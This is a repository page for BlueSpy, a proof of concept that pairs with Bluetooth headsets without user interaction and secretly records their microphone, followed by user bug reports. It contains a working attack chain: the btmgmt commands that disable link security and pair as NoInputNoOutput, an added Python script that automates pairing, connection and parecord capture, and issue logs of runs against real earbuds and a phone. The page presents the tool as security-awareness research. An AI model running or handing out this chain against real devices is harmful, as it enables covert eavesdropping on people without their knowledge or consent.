
BlueSpy - PoC to record audio from a Bluetooth device

This repository contains a proof of concept that records and replays audio from a Bluetooth device without the legitimate user's awareness.

The PoC was demonstrated during the talk BSAM: Seguridad en Bluetooth at RootedCON 2024 in Madrid.

It's designed to raise awareness of the insecure use of Bluetooth devices and of the need for a consistent methodology for security evaluations. That is the purpose of BSAM, the Bluetooth Security Assessment Methodology, published by Tarlogic and available here.

This proof of concept exploits a failure to comply with control BSAM-PA-05 of the BSAM methodology: the device allows pairing without requiring any user interaction, and so exposes its functionality to any agent within signal range.

More information on our blog.

Requirements

The code is written in Python and has been tested with Python 3.11.8, but it mainly relies on tools that are widely available on Linux systems.

The PoC uses the following tools:

  • bluetoothctl
  • btmgmt
  • pactl
  • parecord
  • paplay

In Arch Linux distributions, bluetoothctl and btmgmt can be installed with the package bluez-utils, while pactl, parecord and paplay are available in the libpulse package.

For the PoC to work, it is necessary to have a working installation of the BlueZ Bluetooth stack, available in the bluez package for Arch Linux distributions. A working installation of an audio server compatible with PulseAudio, such as PipeWire, is also required to record and play audio.

Setup

Ensure that your device is capable of functioning as an audio source, meaning it has a microphone, and that it is discoverable and connectable via Bluetooth.

For instance, to be discoverable and connectable, the earbuds used during the talk must be outside of their charging case. By default, they only activate the microphone when placed in the user's ears, although this setting can be adjusted in the configuration app.

Additionally, ensure that the device is not already connected, or alternatively, that it supports multiple connections.

Execution

Firstly, the address of the device must be discovered using a tool such as bluetoothctl:

$ bluetoothctl
[bluetooth]# scan on

Once the address of the device is discovered, the script can handle the rest:

$ python BlueSpy.py -a <address>

Note: The script might prompt for superuser permissions to modify the configuration of your BlueZ instance and pair it with the remote device.

Troubleshooting

BlueSpy.py is the main script and executes every step of the process. If you encounter issues with any of the phases, it might be helpful to execute them individually:

  • pair.py utilizes the command-line tool btmgmt to modify the configuration of your BlueZ and initiate a pairing process with the remote device. The exact commands used are in the pair function inside core.py.
  • connect.py utilizes the command-line tool bluetoothctl to initiate a quick scan (necessary for BlueZ) and establish a connection to the device. The exact commands used are in the connect function inside core.py.
  • just_record.py utilizes the command-line tools pactl and parecord to search for the device in the system's audio sources (it must function as a microphone) and initiate a recording session. The exact commands used are in the record function inside core.py.
  • The playback function inside core.py executes paplay to play back the captured audio.

If you encounter issues with any of the phases, examine the commands in core.py and try to execute them in a shell. This will provide more information on what may be failing.
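The script below is an added example, not part of the BlueSpy repository: it runs the pairing phase one command at a time, using the same btmgmt invocations that appear in the verbose outputs quoted in the issues on this page, and classifies btmgmt's result so that the three failure statuses reported there (0x11 Invalid Index, 0x04 Connect Failed, 0x05 Authentication Failed) are recognised instead of surfacing as a generic exception. In btmgmt's pair command, -c 3 claims the NoInputNoOutput IO capability and -t 0 selects a BR/EDR address, which is what lets pairing complete without a confirmation prompt on the target. The --index option (MGMT status 0x11 means the controller index does not exist, and btmgmt defaults to index 0), the sudo handling, the output parser, the assumed card/source naming scheme (address with underscores instead of colons, as PulseAudio and PipeWire write it) and the pactl sample output are this example's own assumptions.

```python
"""Run BlueSpy's phases by hand and interpret btmgmt's pairing result.

Added example, not code from the BlueSpy repository. Command lines mirror the
ones quoted on this page; --index, the output parser and the pactl source
lookup are assumptions of this example.
"""
import re
import subprocess
from dataclasses import dataclass
from typing import List, Optional

# Success line: "Paired with XX:XX:XX:XX:CA:FE (BR/EDR)"
PAIRED_RE = re.compile(r"^Paired with \S+ \((?:BR/EDR|LE)\)", re.M)
# Both failure spellings quoted on this page:
#   "Pairing failed with status 0x11 (Invalid Index)"
#   "Pairing with ... (BR/EDR) failed. status 0x05 (Authentication Failed)"
FAILED_RE = re.compile(r"failed(?: with|\.) status (0x[0-9a-f]{2}) \(([^)]*)\)", re.I)
ANSI_RE = re.compile(r"\x1b\[[0-9;]*m")  # btmgmt colours its error lines

# Constructed sample of `pactl list short sources` (tab-separated fields:
# index, name, module, sample spec, state); not captured from a real host.
SAMPLE_SOURCES = (
    "0\talsa_input.pci-0000_00_1f.3.analog-stereo\tmodule-alsa-card.c\ts16le 2ch 44100Hz\tSUSPENDED\n"
    "1\tbluez_input.60_AB_D2_43_0C_44.0\tmodule-bluez5-device.c\ts16le 1ch 16000Hz\tRUNNING\n"
)


@dataclass
class PairResult:
    paired: bool
    status: Optional[int]  # MGMT status byte from btmgmt, None on success
    reason: str


def parse_pair_output(out: str) -> PairResult:
    """Classify the output of `btmgmt pair` after stripping ANSI colour codes."""
    clean = ANSI_RE.sub("", out)
    if PAIRED_RE.search(clean):
        return PairResult(True, None, "paired")
    m = FAILED_RE.search(clean)
    if m:
        return PairResult(False, int(m.group(1), 16), m.group(2))
    return PairResult(False, None, "unrecognised output")


def pair_commands(addr: str, index: int = 0, sudo: bool = True) -> List[List[str]]:
    """The btmgmt sequence of the pair phase: make hci<index> bondable and
    pairable, disable link-level security, then pair claiming NoInputNoOutput
    (-c 3) over BR/EDR (-t 0). --index is this example's addition."""
    base = (["sudo"] if sudo else []) + ["btmgmt", "--index", str(index)]
    return [
        base + ["bondable", "true"],
        base + ["pairable", "true"],
        base + ["linksec", "false"],
        base + ["pair", "-c", "3", "-t", "0", addr.lower()],
    ]


def connect_commands(addr: str) -> List[List[str]]:
    """bluetoothctl sequence of the connect phase: short scan, then connect."""
    return [["bluetoothctl", "--timeout", "2", "scan", "on"],
            ["bluetoothctl", "connect", addr.lower()]]


def find_bluez_source(pactl_short_sources: str, addr: str) -> Optional[str]:
    """Pick the BlueZ capture source for addr out of `pactl list short sources`.
    Assumes the audio server writes the address with '_' in place of ':'."""
    wanted = addr.upper()
    for line in pactl_short_sources.splitlines():
        fields = line.split("\t")
        if len(fields) < 2 or not fields[1].startswith("bluez_"):
            continue
        if wanted in fields[1].upper().replace("_", ":"):
            return fields[1]
    return None


def record_commands(addr: str, source: str, outfile: str) -> List[List[str]]:
    """pactl/parecord sequence of the record phase (card name is assumed)."""
    card = "bluez_card." + addr.upper().replace(":", "_")
    return [["pactl", "set-card-profile", card, "headset-head-unit-msbc"],
            ["parecord", "-d", source, outfile]]


def run(cmd: List[str], timeout: int = 30) -> str:
    """Run one step and return its combined output for inspection."""
    proc = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
    return proc.stdout + proc.stderr


def pair(addr: str, index: int = 0) -> PairResult:
    """Execute the pair phase step by step, echoing each command like -v does."""
    out = ""
    for cmd in pair_commands(addr, index):
        print("[C]", " ".join(cmd))
        out = run(cmd)
        print(out)
    return parse_pair_output(out)


if __name__ == "__main__":
    import argparse
    ap = argparse.ArgumentParser(description="Run BlueSpy's pairing step by hand")
    ap.add_argument("-a", "--address", required=True)
    ap.add_argument("-i", "--index", type=int, default=0, help="hci adapter index")
    args = ap.parse_args()
    res = pair(args.address, args.index)
    print("paired" if res.paired else f"pairing failed: status={res.status} ({res.reason})")
```

Running it as `sudo python pair_by_hand.py -a <address> -i 1` (file name assumed) reproduces the pair phase against a second adapter; a status of 0x04 or 0x05 comes back from the remote side, so it points at the target (not discoverable, already connected, or refusing unauthenticated pairing) rather than at the local BlueZ configuration.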

References

If you have any questions regarding how the Bluetooth standard operates or how to assess the security of a Bluetooth device, please refer to our BSAM methodology webpage:

Contributors

  • antoniovazquezblanco
  • beraoudabdelkhalek
  • erjanmx
  • jesusgomezmoreno


Issues

Pairing failed with status 0x11 (Invalid Index)

Hello,

my setup:

I can discover it with bluetoothctl and connect to it with blueman-applet on my kali
But with btmgmt i get 0x11 (Invalid Index) with any peripheral

Any idea?

┌──(kali㉿kali)-[~/Documents/BlueSpy]
└─$ sudo python BlueSpy.py -a 11:75:58:13:F1:DC
░█▀▄░█░░░█░█░█▀▀░█▀▀░█▀█░█░█░
░█▀▄░█░░░█░█░█▀▀░▀▀█░█▀▀░░█░░
░▀▀░░▀▀▀░▀▀▀░▀▀▀░▀▀▀░▀░░░░▀░░
░▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀░
Bluetooth audio recording tool by Tarlogic
[I] Avoiding authentication with 11:75:58:13:F1:DC...
[I] Generating shared key...
Traceback (most recent call last):
  File "/home/kali/Documents/BlueSpy/BlueSpy.py", line 94, in <module>
    main()
  File "/home/kali/Documents/BlueSpy/BlueSpy.py", line 67, in main
    paired = pair(target, verbose=args.verbose)
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Documents/BlueSpy/core.py", line 90, in pair
    raise e
  File "/home/kali/Documents/BlueSpy/core.py", line 79, in pair
    run_and_check(
  File "/home/kali/Documents/BlueSpy/system.py", line 35, in run_and_check
    raise CommandValidationException(cmdline, out)
system.CommandValidationException: ('Error while executing command "sudo btmgmt pair -c 3 -t 0 11:75:58:13:f1:dc"', 'Pairing with 11:75:58:13:F1:DC (BR/EDR)\n\x1b[0;91mPairing failed with status 0x11 (Invalid Index)\n\x1b[0m')
┌──(kali㉿kali)-[~/Documents/BlueSpy]
└─$ sudo btmgmt pair -c 3 -t 0 11:75:58:13:f1:dc
Pairing with 11:75:58:13:F1:DC (BR/EDR)
Pairing failed with status 0x11 (Invalid Index)

Bluez error

Hi guys
I'm facing this issue on kali nethunter
[!] Key generated
[I] The device is vulnerable!
[I] Establishing connection...
[C] bluetoothctl --timeout 2 scan on
SetDiscoveryFilter success
hci0 type 7 discovering on
Discovery started
[CHG] Controller 64:A2:F9:BD:AB:92 Discovering: yes
[NEW] Device 64:5E:9F:B9:D5:54 64-5E-9F-B9-D5-54
hci0 4C:72:74:90:0A:D8 type BR/EDR disconnected with reason 2
[CHG] Device 4C:72:74:90:0A:D8 Paired: no
[CHG] Device 4C:72:74:90:0A:D8 Connected: no

[C] bluetoothctl connect 4c:72:74:90:0a:d8
Attempting to connect to 4c:72:74:90:0a:d8
Failed to connect: org.bluez.Error.Failed br-connection-profile-unavailable

Traceback (most recent call last):
  File "/root/BlueSpy/BlueSpy.py", line 94, in <module>
    main()
  File "/root/BlueSpy/BlueSpy.py", line 78, in main
    connect(target, verbose=args.verbose)
  File "/root/BlueSpy/core.py", line 97, in connect
    run_and_check(
  File "/root/BlueSpy/system.py", line 35, in run_and_check
    raise CommandValidationException(cmdline, out)
system.CommandValidationException: ('Error while executing command "bluetoothctl connect 4c:72:74:90:0a:d8"', 'Attempting to connect to 4c:72:74:90:0a:d8\nFailed to connect: org.bluez.Error.Failed br-connection-profile-unavailable\n')

It works like charm on kali installed on my computer.
Thanks

Error while executing command "bluetoothctl connect XX:XX:XX:XX:XX:XX"

XX:XX:XX:XX:XX:XX is my Phone MAC

┌──(kali㉿kali-raspberry-pi)-[~/Desktop/P_tools/BlueSpy]
└─$ python3 BlueSpy.py -a XX:XX:XX:XX:XX:XX
░█▀▄░█░░░█░█░█▀▀░█▀▀░█▀█░█░█░
░█▀▄░█░░░█░█░█▀▀░▀▀█░█▀▀░░█░░
░▀▀░░▀▀▀░▀▀▀░▀▀▀░▀▀▀░▀░░░░▀░░
░▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀░
Bluetooth audio recording tool by Tarlogic
[I] Avoiding authentication with XX:XX:XX:XX:XX:XX...
[I] Generating shared key...
[!] Key generated
[I] The device is vulnerable!
[I] Establishing connection...
Traceback (most recent call last):
  File "/home/kali/Desktop/P_tools/BlueSpy/BlueSpy.py", line 94, in <module>
    main()
  File "/home/kali/Desktop/P_tools/BlueSpy/BlueSpy.py", line 78, in main
    connect(target, verbose=args.verbose)
  File "/home/kali/Desktop/P_tools/BlueSpy/core.py", line 97, in connect
    run_and_check(
  File "/home/kali/Desktop/P_tools/BlueSpy/system.py", line 35, in run_and_check
    raise CommandValidationException(cmdline, out)
system.CommandValidationException: ('Error while executing command "bluetoothctl connect XX:XX:XX:XX:XX:XX"', 'Attempting to connect to XX:XX:XX:XX:XX:XX\n[\x1b[0;92mNEW\x1b[0m] Endpoint /org/bluez/hci0/dev_XX_XX_XX_XX_XX_XX/sep1 \n[\x1b[0;92mNEW\x1b[0m] Transport /org/bluez/hci0/dev_XX_XX_XX_XX_XX_XX/sep1/fd0 \nFailed to connect: org.bluez.Error.Failed br-connection-unknown\n')


Exception while executing command

From @arobase-che :

Same problem. Here is the result with -v but I tried it on my phone instead of my earbuds (didn't read enough):

░█▀▄░█░░░█░█░█▀▀░█▀▀░█▀█░█░█░
░█▀▄░█░░░█░█░█▀▀░▀▀█░█▀▀░░█░░
░▀▀░░▀▀▀░▀▀▀░▀▀▀░▀▀▀░▀░░░░▀░░
░▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀░
Bluetooth audio recording tool by Tarlogic
[I] Avoiding authentication with XX:XX:XX:XX:CA:FE...
[I] Generating shared key...
[C] sudo btmgmt bondable true
hci0 Set Bondable complete, settings: powered ssp br/edr le secure-conn cis-central cis-peripheral 

[C] sudo btmgmt pairable true
hci0 Set Bondable complete, settings: powered ssp br/edr le secure-conn cis-central cis-peripheral 

[C] sudo btmgmt linksec false
hci0 Set Link Security complete, settings: powered ssp br/edr le secure-conn cis-central cis-peripheral 

[C] sudo btmgmt pair -c 3 -t 0 XX:XX:XX:XX:CA:FE
Pairing with XX:XX:XX:XX:CA:FE (BR/EDR)
hci0 XX:XX:XX:XX:CA:FE type BR/EDR connected eir_len 20
hci0 new_link_key XX:XX:XX:XX:CA:FE type 0x07 pin_len 0 store_hint 0
Paired with XX:XX:XX:XX:CA:FE (BR/EDR)

[!] Key generated
[I] Establishing connection...
[C] bluetoothctl --timeout 2 scan on
SetDiscoveryFilter success
Discovery started
[CHG] Controller XX:XX:XX:XX:DE:AD Discovering: yes
[NEW] Device XX:XX:XX:XX:F0:0D LE-MINOR III
[CHG] Device XX:XX:XX:XX:CA:FE Modalias: bluetooth:v0075p0100d0201
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx05-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx0a-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx0c-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx0e-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx12-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx15-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx16-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx1f-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx2d-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx2f-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx32-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx00-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx00-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx01-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE UUIDs: xxxxxx55-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[CHG] Device XX:XX:XX:XX:CA:FE ServicesResolved: yes
[CHG] Device XX:XX:XX:XX:CA:FE Paired: yes

[C] bluetoothctl connect XX:XX:XX:XX:CA:FE
Attempting to connect to XX:XX:XX:XX:CA:FE
[CHG] Device XX:XX:XX:XX:F0:0D TxPower is nil
[CHG] Device XX:XX:XX:XX:F0:0D RSSI is nil
[CHG] Controller XX:XX:XX:XX:DE:AD Discovering: no
Failed to connect: org.bluez.Error.Failed br-connection-unknown

[I] Starting audio recording...
[!] Recording!
[C] pactl set-card-profile bluez_card.XX:XX:XX:XX:CA:FE headset-head-unit-msbc

Traceback (most recent call last):
  File "/home/ache/Test/BlueSpy/BlueSpy.py", line 87, in <module>
    main()
  File "/home/ache/Test/BlueSpy/BlueSpy.py", line 77, in main
    record(target, outfile=args.outfile, verbose=args.verbose)
  File "/home/ache/Test/BlueSpy/core.py", line 128, in record
    run_and_check(
  File "/home/ache/Test/BlueSpy/core.py", line 73, in run_and_check
    raise Exception(f"Error while executing command {cmdline}", out)
Exception: ('Error while executing command pactl set-card-profile bluez_card.XX:XX:XX:XX:CA:FE headset-head-unit-msbc', '')

On my phone, I had a quick flash notification unable to pair.

Trying to get more information by adding the -m flag to bluetoothctl then relaunching the script (only the interesting part):

[C] bluetoothctl -m connect XX:XX:XX:XX:CA:FE
Unable to open logging channel
Attempting to connect to XX:XX:XX:XX:CA:FE
[DEL] Device XX:XX:XX:XX:F0:0D LE-MINOR III
[CHG] Device XX:XX:XX:XX:CA:FE Connected: yes
Failed to connect: org.bluez.Error.Failed br-connection-unknown

Humm ... Don't know why. sudo maybe ? >_<"

[C] sudo bluetoothctl -m connect XX:XX:XX:XX:CA:FE
Attempting to connect to XX:XX:XX:XX:CA:FE
hci0 device_flags_changed: 80:07:94:3C:B5:C6 (BR/EDR)
     supp: 0x00000001  curr: 0x00000000
Failed to connect: org.bluez.Error.Failed br-connection-unknown

Nope.

I tried remove XX:XX:XX:XX:CA:FE in bluetoothctl; it didn't work.

Using on my earbuds (with microphones):

░█▀▄░█░░░█░█░█▀▀░█▀▀░█▀█░█░█░
░█▀▄░█░░░█░█░█▀▀░▀▀█░█▀▀░░█░░
░▀▀░░▀▀▀░▀▀▀░▀▀▀░▀▀▀░▀░░░░▀░░
░▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀░
Bluetooth audio recording tool by Tarlogic
[I] Avoiding authentication with XX:XX:XX:XX:F0:0D...
[I] Generating shared key...
[C] sudo btmgmt bondable true
hci0 Set Bondable complete, settings: powered ssp br/edr le secure-conn cis-central cis-peripheral 

[C] sudo btmgmt pairable true
hci0 Set Bondable complete, settings: powered ssp br/edr le secure-conn cis-central cis-peripheral 

[C] sudo btmgmt linksec false
hci0 Set Link Security complete, settings: powered ssp br/edr le secure-conn cis-central cis-peripheral 

[C] sudo btmgmt pair -c 3 -t 0 XX:XX:XX:XX:F0:0D
Pairing with XX:XX:XX:XX:F0:0D (BR/EDR)
hci0 XX:XX:XX:XX:F0:0D type BR/EDR connect failed (status 0x04, Connect Failed)
Pairing with XX:XX:XX:XX:F0:0D (BR/EDR) failed. status 0x04 (Connect Failed)

Traceback (most recent call last):
  File "/home/ache/Test/BlueSpy/BlueSpy.py", line 87, in <module>
    main()
  File "/home/ache/Test/BlueSpy/BlueSpy.py", line 67, in main
    pair(target, verbose=args.verbose)
  File "/home/ache/Test/BlueSpy/core.py", line 95, in pair
    run_and_check(
  File "/home/ache/Test/BlueSpy/core.py", line 73, in run_and_check
    raise Exception(f"Error while executing command {cmdline}", out)
Exception: ('Error while executing command sudo btmgmt pair -c 3 -t 0 XX:XX:XX:XX:F0:0D', 'Pairing with XX:XX:XX:XX:F0:0D (BR/EDR)\nhci0 XX:XX:XX:XX:F0:0D type BR/EDR connect failed (status 0x04, Connect Failed)\n\x1b[0;91mPairing with XX:XX:XX:XX:F0:0D (BR/EDR) failed. status 0x04 (Connect Failed)\n\x1b[0m')

-m doesn't display more information.

I feel a little safer but still concerned. Will try with another pair in two weeks.

Originally posted by @arobase-che in #1 (comment)

BR/EDR) failed. status 0x05 (Authentication Failed)

Hello,

I'm trying with bose QC35 and RPI4 with kali.
The QC35 is connected with a laptop and can play sound.

[I] Avoiding authentication with 60:AB:D2:43:0C:44...
[I] Generating shared key...
Traceback (most recent call last):
  File "/home/kali/sources/BlueSpy/BlueSpy.py", line 89, in <module>
    main()
  File "/home/kali/sources/BlueSpy/BlueSpy.py", line 69, in main
    pair(BluezTarget(args.address, args.address_type), verbose=False)
  File "/home/kali/sources/BlueSpy/core.py", line 95, in pair
    run_and_check(
  File "/home/kali/sources/BlueSpy/core.py", line 73, in run_and_check
    raise Exception(f"Error while executing command {cmdline}", out)
Exception: ('Error while executing command sudo btmgmt pair -c 3 -t 0 60:ab:d2:43:0c:44', 'Pairing with 60:AB:D2:43:0C:44 (BR/EDR)\nhci0 60:AB:D2:43:0C:44 type BR/EDR connected eir_len 14\n\x1b[0;91mPairing with 60:AB:D2:43:0C:44 (BR/EDR) failed. status 0x05 (Authentication Failed)\n\x1b[0m')

Update output with -v option:

[I] Avoiding authentication with 60:AB:D2:43:0C:44...
[I] Generating shared key...
[C] sudo btmgmt bondable true
hci0 Set Bondable complete, settings: powered ssp br/edr le secure-conn

[C] sudo btmgmt pairable true
hci0 Set Bondable complete, settings: powered ssp br/edr le secure-conn

[C] sudo btmgmt linksec false
hci0 Set Link Security complete, settings: powered ssp br/edr le secure-conn

[C] sudo btmgmt pair -c 3 -t 0 60:ab:d2:43:0c:44
Pairing with 60:AB:D2:43:0C:44 (BR/EDR)
hci0 60:AB:D2:43:0C:44 type BR/EDR connected eir_len 14
Pairing with 60:AB:D2:43:0C:44 (BR/EDR) failed. status 0x05 (Authentication Failed)

Traceback (most recent call last):
  File "/home/kali/sources/BlueSpy/BlueSpy.py", line 97, in <module>
    main()
  File "/home/kali/sources/BlueSpy/BlueSpy.py", line 77, in main
    pair(BluezTarget(args.address, args.address_type), verbose=args.verbose)
  File "/home/kali/sources/BlueSpy/core.py", line 95, in pair
    run_and_check(
  File "/home/kali/sources/BlueSpy/core.py", line 73, in run_and_check
    raise Exception(f"Error while executing command {cmdline}", out)
Exception: ('Error while executing command sudo btmgmt pair -c 3 -t 0 60:ab:d2:43:0c:44', 'Pairing with 60:AB:D2:43:0C:44 (BR/EDR)\nhci0 60:AB:D2:43:0C:44 type BR/EDR connected eir_len 14\n\x1b[0;91mPairing with 60:AB:D2:43:0C:44 (BR/EDR) failed. status 0x05 (Authentication Failed)\n\x1b[0m')

Manually:
└─$ sudo btmgmt pair -c 3 -t 0 60:ab:d2:43:0c:44
Pairing with 60:AB:D2:43:0C:44 (BR/EDR)
hci0 60:AB:D2:43:0C:44 type BR/EDR connected eir_len 14
Pairing with 60:AB:D2:43:0C:44 (BR/EDR) failed. status 0x05 (Authentication Failed)

Any idea?
